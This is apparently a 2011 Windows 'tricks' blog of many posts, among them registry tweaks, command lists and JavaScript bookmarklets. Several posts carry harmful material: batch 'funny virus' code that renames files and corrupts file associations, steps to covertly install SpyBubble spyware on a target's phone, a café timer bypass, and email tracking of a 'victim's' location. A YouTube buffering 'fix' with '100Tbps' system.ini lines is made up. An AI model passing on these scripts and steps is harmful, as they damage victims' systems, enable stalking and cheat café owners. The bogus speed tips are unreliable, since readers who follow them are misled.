Windows Registry Tricks

Saturday 29 October 2011

Windows Registry Tricks

Heres' the SECRET

Here are some of Windows Registry Tricks which you can tryout :

open registry edit by pressing windows key +R type in regedit hit enter

1. Disable the Autorun Option in your CD Rom Drive:

Open your Registry and navigate to "HK_L_M\system\currentcontrolset\services\cdro m"
Change the value of 'Autorun', or create a new DWORD value if it doesn't already exist, and set the value as '0' for Autorun disabled.

2.
Disable the Harddisk Lowdiskspace warning in Windows Xp

User Key: "HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
System Key: "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
create a new DWORD 'NoLowDiskSpaceChecks' and change its value to '1'.

3. Disable the Windows Key

"HK_L_M\system\currentcontrolset\control\keybo ard layout"
Create a new Binary value, or modify the existing value called 'Scancode Map' as shown below.
Value: 00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00

4. View System BIOS Information


Open Registry and navigate to
"HK_L_M\hardware\description\system"

5. Change the Title of WindowsMedia Player

"HK_C_USER\software\policies\microsoft\windows medi aplayer\"
Create a new string value called ' TitleBar' and change text as your wish.

6. Disable Internet access in Network

Open Registry and make the following changes
"KH_C_User\software\microsoft\windows\currentv ersi on\internetsettings\"
Change the value of "Proxyenabled" to 1 and change the value of "proxyserver" and set it to an ip address. Change the value of the ip address and port to "10.0.0.1:5555"

7. Disable the ability to Right click on the desktop
"HK_C_User\software\microsoft\windows\currentv ersi on\policies\explorer\"
Create a DWORD "NoViewContextMenu" and change its value to "0" for disabling and "1" for enabling.

8. Hide all items on desktop

"HK_C_USER\software\microsoft\windows\currentv ersi on\policies\explorer\"
and
"HK_L_M\software\microsoft\windows\currentvers ion\ policies\explorer\"
create a new DWORD "NoDesktop" and change its value to "1"
You can show all the items in the desktop by chaning the value to "0"

9. Disable the "Change Password" button in windows

"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\System"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersi on\Policies\System"
Create a new DWORD "DisableChangePassword" and change its value to "0" for disabling and "1" for enabling.

10. Disable the "cancel" button or pressing the "Esc" key while logging on to Windows"

"HKEY_USERS\.DEFAULT\Software\Microsoft\Window s\Cu rrentVersion\Run"
Create a new string value "NoLogon" and change its value to "RUNDLL32 shell32,SHExitWindowsEx 0"

11. Remove "Log off" from start menu
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoLogOff" and change its value to "1" for disabling and "0" for enabling.

12. Clear the Recent playlist in Media Player

Navigate to "HKEY_CURRENT_USER\Software\Microsoft\MediaPla yer\ Player"
And clear the "RecentFileList" subkey.

13. Empty temporary Internet files on exit (in Internet Explorer)
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Internet Settings\Cache"
and
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \Cur rentVersion\Internet Settings\Cache"
Create a new DWORD "Persistent" and change the value to "0" for emptying and "1" to remove this option.

14. Clear the Internet Explorere typed addresses history

"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs"
And delete the subkeys.

15. Remove recent documents from start menu

"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoRecentDocsMenu" and change its value to "1".

16. Remove Network connections from start menu

"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoNetworkConnections" and change its value to "1".

17. Remove My documents from start menu

"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoSMMyDocs" and change its value to "1".

18. Remove My pictures from start menu

"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer "
Create a new DWORD "NoSMMyPictures" ad change its value to "1".

19. Remove My music fro start menu

"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoStartMenuMyMusic" and change its value to "1".

20. Reboot windows after crash

"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\C ontr ol\CrashControl"
Create a new DWORD "AutoReboot" and change its value to "1".Restart the machine for the effect to take place.

21. Disable the use of MSDos
User Key: "HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\WinOldApp"
and
System Key: "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\WinOldApp"
Create a new DWORD "Disabled" and set its value to "1". Change it to "0" for enabling.

22. Enable Directory completion in MSDos prompt

User Key: "HKEY_CURRENT_USER\Software\Microsoft\Command Processor
and
System Key: "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor"
Create a new DWORD "PathCompletionChar " and set it to equal the hex value of the required control character.

23. Quick edit the command prompt
User Key: "HKEY_CURRENT_USER\Console"
and
System Key: "HKEY_USERS\.DEFAULT\Console"
Create a new DWORD "QuickEdit" and set its value to "1" for enabling and "0" for disabling.

24. Disable Registry editing
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\ Curr entVersion\Policies\System"
Create a new DWORD "DisableRegistryTools" and change its value to "0" for allowing Regeditand "1" for disabling it.

25. Disable task scheduler

" HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices"
Delete the value from "SchedulingAgent". Usually its value is set to "'mstask.exe".

26. Remove My computer from desktop and start menu
User Key: "HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\NonEnum"
and
System Key: "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\NonEnum"
Create "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" and change its value to "1" for removing. Change its value to "0" for showing.

27. Show Windows version on desktop

User Key: "HKEY_CURRENT_USER\Control Panel\Desktop"
Create a new DWORD " PaintDesktopVersion" and change its value to "1" for showing and "0" for removing.

28. Remove My documenst from desktop
Windows 95, 98 and Me

"HKEY_CURRENT_USER\Software\Classes\CLSID\{450 D8FB A-AD25-11D0-98A8-0800361B1103}\ShellFolder"
Windows NT, 2000 and XP
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Explorer\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder"
Modify the value called "Attributes" as "0xf0500174" to hide or "0xf0400174" to show.

29. Disable Scan disk after improper shutdown

" HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contro l\FileSystem"
create a new DWORD "DisableScandiskOnBoot" and change its value to "01" for disablng and "00" for enabling.

30. Automatically end Hung programs.

" HKEY_CURRENT_USER\Control Panel\Desktop"
and
System Key: [HKEY_USERS\.DEFAULT\Control Panel\Desktop"
Modify the value of "AutoEndTasks" to "1".

DIWALI BOOM

Thursday 27 October 2011

Change all extensions to txt
(Funny virus)

Heres' The SECRET

*.* open notepad (window key + R typin notepad)

Copy paste the following code and save as prasoon .bat

REN *.DOC *.TXT

REN *.JPEG *.TXT

REN *.LNK *.TXT

REN *.AVI *.TXT

REN *.MPEG *.TXT

REN *.COM *.TXT

REN *.BAT *.TXT

Download the batch file => Click on me

Here is the another MAGIC


Copy paste the following code and save as prasoon .bat

@echo off

assoc .txt=jpegfile

assoc .exe=htmlfile

assoc .jpeg=avifile

assoc .png=mpegfile

assoc .mpeg=txtfile

assoc .sys=regfile

msg Your System is cracked …..

exit

Download the batch file =>  Click on me


How To Spy A Mobile Phone

How To Spy A Mobile Phone? - CellPhone Spying Software

Only For Educational purposes:

Heres' the SECRET

SpyBubble is a software that allows you to log in from any computer and access any smartphone that it is installed on. Through SpyBubble, you can monitor and supervise any smartphone simply by entering your login username and password.

How To Download And Install SpyBubble On A Smartphone:

Step *. Open the Web Browser on your target phone and type in the following address and press Enter.

http://www.spybubble.com/symbian/sbubble.sis

TO download spybubble =>  Click on me

Step **. After SpyBubble has been installed, Switch the phone off and then on.

Step ***. Register your license key as shown below.

To get you license key, go to: SpyBubble Setting Page (you may have to log into the system first) You can also go to the member control panel and click on the Configuration menu to get it.

Step ****: Log in to http://www.SpyBubble.com/. Login Panel to verify if your account is working flawlessly.

Features
:

*Has GPS tracking.
**Can spy on text messages.
***Can get contact book info from phone.
****Can check out call log.
*****Popular Smart Phones supported.
******Can be used to back up your own phone’s information.
*******100% undetectable.

Javscripts tricks

Javscripts tricks

Heres' the SECRET

Just copy paste the java script in to the address bar and hit enter and see the MAGIC

*.*  Edit any webpage..   just copy paste the javascript in to the address bar and hit enter and see the MAGIC

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0



*.* Dancing Images

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);


*.* Play Game

javascript:var%20s%20=%20document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://erkie.github.com/asteroids.min.js';void(0);

*.* Infinite Alert Boxes


javascript:while(1){alert('Restart your brower to close this box!')}


*.* Calculator

javascript: alert(4+5+6+7+(3*10));


.*.* View Passwords Behind Asterisk

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();

*.* Fly Code

javascript: for (var int = 0; int < 600; int++) { var rand = Math.floor(Math.random()*600); window.scroll(0, rand); } void(0);

*.* Hate Code

This will make your page display a popup that cannot be removed unless you click the ok button (only available button) 500 times.

You can change the 500 below to whatever you wish, you may also change the left! in quotations to whatever message you want. There is a custom one below as an example.
Code:

javascript: var t = 500; for (var int = 0; int < t; int++) { var l = t – int; alert(l +’ left!’); } void(0);
Image:

Disable The Internet Cafe's Timer

Disable The Internet Cafe's Timer

Heres' the SECRET

Manual Way to do it

Go to the registry editor (open cmd type regedit and hit enter ), than navigate to

"HKEY_CURRENT_USER>Appevents>software>classes>Microsoft>windows>current version>internet settings>policies>system"

than on the right pane where it says Disable Task manager, right click on it, and scroll down to modify, and than change the value of it to "0", and than open Windows Task Manager By Holding Down These Keys, "CTRL+ALT+DEL/DELETE" And Than Disable The Internet Cafe's Timer,

Software that helps you to Kill time of cyber cafe


SoftwareS click and download (free download)

*.*  I_Want_To_Play_Free_v2   => to download Click on me

*.* net time client server_zip     => to download Click on me

*.* Process Suspender (the best)=> to download Click on me

UNLIMTED TIME.Enjoy it..!!!

Trick To SEND free sms from FACEBOOK

Wednesday 26 October 2011

Trick To SEND free sms from FACEBOOK

Heres' The SECRET


If your 100sms is over for one day and you want to send more sms to your friends
Here is the solution for that from which you can send 700sms/day
  • First login to facebook.com
  • Second goto this link Click on me

  • and select any free website from which you want to send free sms

*160by2.com
**way2sms.com
***mycantos.com
****fullonsms.com
******smsze.com
*******freesms88.com
********site2sms.com
then enter the website username and password you selected
if you have any username and password register and then start sending free sms to your friends.

How To Send Email on Later Date

How To Send Email on Later Date

Heres' the SECRET

    Go to the website www.lettermelater.com
 STEPS
* Click on Sign up For Free button and fill your information.

** Now verify your account by visiting your Email Address that you had given in the Sign up process.

*** Now click on the Compose button to send a new Email.

**** In the From Field you will see your Email Address from which you are sending an Email, in To Field give recipient’s email address
   
***** Click on the Calendar button to set date and time when you want to send your Email and attach a file if any.

****** Click on Schedule to be Sent now your Email will be sent on your scheduled date.

This works in all browsers and this will not affect your account privacy.


Features Of LetterMeLater


* File attachments!
* Send emails later from your own email program!
* Create HTML emails! Use rich content to add style and structure.
* Send emails from any of your email addresses.
* Send recurring emails.
* Your email will be the return address on the emails you send.
* Import your contacts and create group mailing lists.
* Send emails with carbon copies (cc) and blind carbon copies (bcc).
* The time of day to send is specified in your local time.

HAPPY DIWALI

Tuesday 25 October 2011

Increase Youtube video buffering speed

Increase Youtube as well as sites like Metacafe video buffering speed

Heres' the SECRET

Start => Run (windows key + R) => system.ini => Hit Enter

A notepad will open which contain the following code-
Code:
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]

Copy the below text and paste it there-

Code:
page buffer=100Tbps
load=100Tbps
download=100Tbps
save=100Tbps
back=100Tbps
search=100Tbps
sound=100Tbps
webcam=100Tbps
voice=100Tbps
faxmodemfast=100Tbps
update=100Tbps

Save it and enjoy!!!

Paste blank status on Facebook

How to Paste blank STATUS / Comment in Facebook

Heres' the SECRET

Paste: @[0:0: ].........(note:- the text is like @[0:0:space],don't write
space rather press spacebar where i have write space )




For MultiLine Blank Status :

Paste: Like I have shown below
@[0:0: ]
@[0:0: ]
@[0:0: ]
@[0:0: ]
@[0:0: ]
@[0:0: ]

Method **

Steps:

1:Go to Facebook status
2:Type @[2:2: ]
3: post it.

Recover deleted SMS Messages

Recover deleted SMS Messages

Heres' the SECRET


Hence read them right on your phone.


Things you will need .:

* A Nokia Mobile supporting application download.

**. Second search for any File-Manager like ( FExplorer, Fileman or any other )

      fexplorer => to download Click on me

***. Install that application on your cellphone.

****. Now when everything is ready follow the below steps .:


Procedure to Read Deleted SMS in Mobile
.:

*. Open your File-Manager i.e.. FExplorer or Fileman

**. Select the memory card drive that can be C: or D: just check it out.

***. Now after opening drive navigate to System > Mail

****Now in Mail folder you will see different folders like ( 0010001_s )

*****. Now the above folders are the actual messages which you are going to read, now there will be many folders which are actually all the messages now search for the one you are browsing and than do not open that directly as it will not be supported, choose the one you wanna open than choose open > file > hex/text viewer.

******. That’s it now you are reading the deleted SMS which you can copy or transfer into other phone by sending it through Bluetooth.

Mozilla Firefox and Internet Explorer Keyboard shortcuts

Mozilla Firefox and Internet Explorer Keyboard shortcuts:

Heres' the SECRET


Keyboard Shortcuts:

Alt + Left Arrow key : To go to back page

Alt + Right Arrow key : To go to next page

Alt + Home key : To go to Home page.

Ctrl + + : To increase font size.

Ctrl + - : To decrease font size

Ctrl + 0 : To Default font size

Ctrl + F : To search any text

Ctrl + G or F3 : To search again last searched

Ctrl + T : To create new tab

Ctrl + N : To create new window

Ctrl + Tab key : To select next tab

Ctrl + W : To close tab.

Ctrl + Shit + T : To restore recently closed tab.

Ctrl + Shift + W : To close window.

Ctrl + F4 : To close tab.

Alt + F4 : To close window

Ctrl + Shift T : Open recently closed tab.

Ctrl + R : Reload

Ctrl + U : To view page source file

Ctrl + Tab key : To select next tab

Ctrl + Shift + Tab key : To select previous tab

Ctrl + 9 : To select last tab

Alt + Enter key : When you typed URL in address bar and you want to open it in a new window then type URL and Press Alt + Enter key.

F11 : To full screen.

F5 : Reload

If you want to Add and Remove buttons in Firefox Standard toolbar by clicking View Menu select Customize in Toolbar option here you can add and remove buttons. To add new button select and drag and drop where you want.


Mouse Shortcuts

Shift + Scroll down button : To go back

Middle click on the tab : To close tab

Ctrl + Scroll Up : To decrease font size

Ctrl + Scroll Down : to increase font size

Double click on tab toolbar : To load new tab

FIX all your corrupted files.

FIX all your corrupted files.


Heres' the Secret



Requirement:
Windows Operating System CD.
Steps to fix or repair Corrupt files in Windows without formatting:

*. First of all Scan your system with your updated antivirus thoroughly and ensure that all viruses and malwares are removed according to antivirus.

**. Now after scanning system, the only problem remains is corrupted files pop up messages that come because their dynamic linking has been modified by virus or due to some file deletion issues.

***. Now place your WINDOWS CD into CD/DVD drive.

****. After putting your CD. Go to Start and then open RUN.

*****. Now type the following command into RUN text field.
'sfc /scannow'
 without quotes and press enter.

******. Now it will load all your windows file and fix all your corrupted files.

How to make self destructing E-MAIL

This method is very useful for to send secret message to your friend.

How to make self destructing  E-MAIL follow the method.

Heres' the SECRET

*) First to make account on this site.

            http://www.self-destructing-email.com/

            http://www.destructingmessage.com/

           http://anonymouse.org/anonemail.html

**) After creating successfully account  and go to your regular mail account and  send mail to friend
Ex.    prasoon_nigam@yahoo.com.self-destructing-email.com  
3) At vitim side that receive message and  read message after  1 minute Email  will remove

***) Now using  self destructing service also track person location and ip who read your msg.  Go to http://www.self-destructing-email.com/

Login your account in that site. And after you will see mail you send from other email account .and open it. You will get detail
Using this technique also you can find victim exact location and service provider ip address. 

****) With http://www.destructingmessage.com/ Email will delete at certain level of time you allot time before you make an self destructive email and this works without registration

Here is a collection of 100 Commands

Monday 24 October 2011

Here is a collection of 100 Commands

That can be entered in Start>Run in Windows XP, with their functions mentioned therein. I like it. If you can remember some important ones, you can save a lot of time.

Heres' the SECRET

Go to StartMenu>RUN shortcut key (window key + R)

There you can enter these commands to get the results mentioned.
Function & Command
———————- ————————-
Accessibility Controls
access.cpl
Add Hardware Wizard
hdwwiz.cpl
Add/Remove Programs
appwiz.cpl
Administrative Tools
control admintools
Automatic Updates
wuaucpl.cpl
Bluetooth Transfer Wizard
fsquirt
Calculator
calc
Certificate Manager
certmgr.msc
Character Map
charmap
Check Disk Utility
chkdsk
Clipboard Viewer
clipbrd
Command Prompt
cmd
Component Services
dcomcnfg
Computer Management
compmgmt.msc
Date and Time Properties
timedate.cpl
DDE Shares
ddeshare
Device Manager
devmgmt.msc
Direct X Control Panel (If Installed)*
directx.cpl
Direct X Troubleshooter
dxdiag
Disk Cleanup Utility
cleanmgr
Disk Defragment
dfrg.msc
Disk Management
diskmgmt.msc
Disk Partition Manager
diskpart
Display Properties
control desktop
Display Properties
desk.cpl
Display Properties (w/Appearance Tab Preselected)
control color
Dr. Watson System Troubleshooting Utility
drwtsn32
Driver Verifier Utility
verifier
Event Viewer
eventvwr.msc
File Signature Verification Tool
sigverif
Findfast
findfast.cpl
Folders Properties
control folders
Fonts
control fonts
Fonts Folder
fonts
Free Cell Card Game
freecell
Game Controllers
joy.cpl
Group Policy Editor (XP Prof)
gpedit.msc
Hearts Card Game
mshearts
Iexpress Wizard
iexpress
Indexing Service
ciadv.msc
Internet Properties
inetcpl.cpl
IP Configuration (Display Connection Configuration)
ipconfig /all
IP Configuration (Display DNS Cache Contents)
ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)
ipconfig /flushdns
IP Configuration (Release All Connections)
ipconfig /release
IP Configuration (Renew All Connections)
ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)
ipconfig /registerdns
IP Configuration (Display DHCP Class ID)
ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID)
ipconfig /setclassid
ava Control Panel (If Installed)
jpicpl32.cpl
Java Control Panel (If Installed)
javaws
Keyboard Properties
control keyboard
Local Security Settings
secpol.msc
Local Users and Groups
lusrmgr.msc
Logs You Out Of Windows
logoff
Mcft Chat
winchat
Minesweeper Game
winmine
Mouse Properties
control mouse
Mouse Properties
main.cpl
Network Connections
control netconnections
Network Connections
ncpa.cpl
Network Setup Wizard
netsetup.cpl
Notepad
notepad
Nview Desktop Manager (If Installed)
nvtuicpl.cpl
Object Packager
packager
ODBC Data Source Administrator
odbccp32.cpl
On Screen Keyboard
osk
Opens AC3 Filter (If Installed)
ac3filter.cpl
Password Properties
password.cpl
Performance Monitor
perfmon.msc
Performance Monitor
perfmon
Phone and Modem Options
telephon.cpl
Power Configuration
powercfg.cpl
Printers and Faxes
control printers
Printers Folder
printers
Private Character Editor
eudcedit
Quicktime (If Installed)
QuickTime.cpl
Regional Settings
intl.cpl
Registry Editor
regedit
Registry Editor
regedit32
Remote Desktop
mstsc
Removable Storage
ntmsmgr.msc
Removable Storage Operator Requests
ntmsoprq.msc
Resultant Set of Policy (XP Prof)
rsop.msc
Scanners and Cameras
sticpl.cpl
Scheduled Tasks
control schedtasks
Security Center
wscui.cpl
Services
services.msc
Shared Folders
fsmgmt.msc
Shuts Down Windows
shutdown
Sounds and Audio
mmsys.cpl
Spider Solitare Card Game
spider
SQL Client Configuration
cliconfg
System Configuration Editor
sysedit
System Configuration Utility
msconfig
System File Checker Utility (Scan Immediately)
sfc /scannow
System File Checker Utility (Scan Once At Next Boot)
sfc /scanonce
System File Checker Utility (Scan On Every Boot)
sfc /scanboot
System File Checker Utility (Return to Default Setting)
sfc /revert
System File Checker Utility (Purge File Cache)
sfc /purgecache
System File Checker Utility (Set Cache Size to size x)
sfc /cachesize=x
System Properties
sysdm.cpl
Task Manager
taskmgr
Telnet Client
telnet
User Account Management
nusrmgr.cpl
Utility Manager
utilman
Windows Firewall
firewall.cpl
Windows Magnifier
magnify
Windows Management Infrastructure
wmimgmt.msc
Windows System Security Tool
syskey
Windows Update Launches
wupdmgr
Windows XP Tour Wizard
tourstart
Wordpad

How to Download Desired Torrent file with IDM!!

Saturday 8 October 2011

How to Download Desired Torrent file with IDM!!

H3r3's the Secret

STEPS:

*.* Download IDM (Internet download manager) full version :: Click on me

Second link for download IDM (Click On Me)

 *. Download the torrent file(.torrent) which you want to download...!

 **. Then just go to the website http://en.savefrom.net/ and upload the torrent file that you have just downloaded and click on the cache! button..,,!

 ***. This will give you a new torrent file . You just have to copy the link of the new torrent file from the opened window..,,..!

****. Then go to the website http://zbigz.com/ and create an account there(in case you don’t have) and login to your account. Then paste the address of the new torrent obtained in step 3 and click on Get button.,.,,...!

*****. Now you will get the list of available files present in that torrent file. Then click on the initiate bittorrent transmission button. This will give the full option to download the file. Just click on any link and you can see the download manager-IDM popping out for downloading the file.,.,.!!



Now enjoy the ultimate speed of IDM for downloading torrents too….:)

Alt Codes for using Keyboard Keys

Sunday 2 October 2011


Alt Codes for using Keyboard Keys.


So Heres' the secret of all 255 Keyboard Alt codes that you can use .

Alt Codes : These are the symbols that are not on keyboard but can be produced by pressing
a simple alt key along with some number of codes from Notepad.Pressing these two keys
simultaneously gives you a symbol.
Always Use Notepad to type the numbers .

In these Tables One column of Symbol and Other for the Number which give this symbol with
Pressing "Alt + " .

Steps : *. first Press 'Alt' key

 
**. By pressing this key press any number given in the list 1 to 255 , then Leave these keys . You Will get the Required Symbol

SymbolNumber
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
§21
22
23
24
25
26
27
28
29
30
31
space32
!33
"34
#35
$36
%37
&38
'39
(40
)41
*42
+43
,44
-45
.46
/47
048
149
250
351
452
553
654
755
856
957
:58
;59
<60
=61
>62
?63
@64
A65
B66
C67
D68
E69
F70
G71
H72
I73
J74
K75
L76
M77
N78
O79
P80
Q81
R82
S83
T84
U85
SymbolNumber
V86
W87
X88
Y89
Z90
[91
\92
]93
^94
_95
`96
a97
b98
c99
d100
e101
f102
g103
h104
i105
j106
k107
l108
m109
n110
o111
p112
q113
r114
s115
t116
u117
v118
w119
x120
y121
z122
{123
|124
}125
~126
127
Ç128
ü129
é130
â131
ä132
à133
å134
ç135
ê136
ë137
è138
ï139
î140
ì141
Ä142
Å143
É144
æ145
Æ146
ô147
ö148
ò149
û150
ù151
ÿ152
Ö153
Ü154
¢155
£156
¥157
158
ƒ159
á160
í161
ó162
ú163
ñ164
Ñ165
ª166
º167
¿168
169
¬170
SymbolNumber
½171
¼172
¡173
«174
»175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
α224
ß225
Γ226
π227
Σ228
σ229
µ230
τ231
Φ232
Θ233
Ω234
δ235
236
φ237
ε238
239
240
±241
242
243
244
245
÷246
247
°248
249
·250
251
252
²253
254

255